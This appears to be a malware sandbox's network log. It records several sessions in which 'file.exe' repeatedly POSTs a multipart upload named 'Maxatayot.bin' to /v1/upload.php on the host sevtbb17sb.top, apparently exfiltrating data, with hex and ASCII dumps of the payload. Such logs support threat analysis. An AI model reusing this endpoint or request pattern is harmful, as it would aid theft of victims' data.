Oct 20, 2024 22:48:15.342065096 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:15.342114925 CEST	4944	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:15.342179060 CEST	4944	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:15.342205048 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:15.342268944 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49854	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:16.789419889 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:16.789491892 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:16.794555902 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:16.794583082 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:16.794672966 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:16.794699907 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:16.794727087 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:16.794759035 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:16.794790030 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:16.794841051 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49866	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:18.296349049 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:18.296432972 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:18.301472902 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:18.301503897 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:18.301538944 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:18.301585913 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:18.301644087 CEST	4944	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:18.301708937 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:18.301759005 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49873	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:19.805001974 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:19.805057049 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:19.810029030 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:19.810096025 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:19.810122967 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:19.810177088 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:19.810192108 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:19.810228109 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:19.810261011 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:19.810280085 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49880	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:21.242285967 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:21.242353916 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:21.247406960 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:21.247622013 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:21.247672081 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:21.247709036 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:21.247759104 CEST	4944	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:21.247817993 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:21.247848034 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49890	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:22.666718960 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
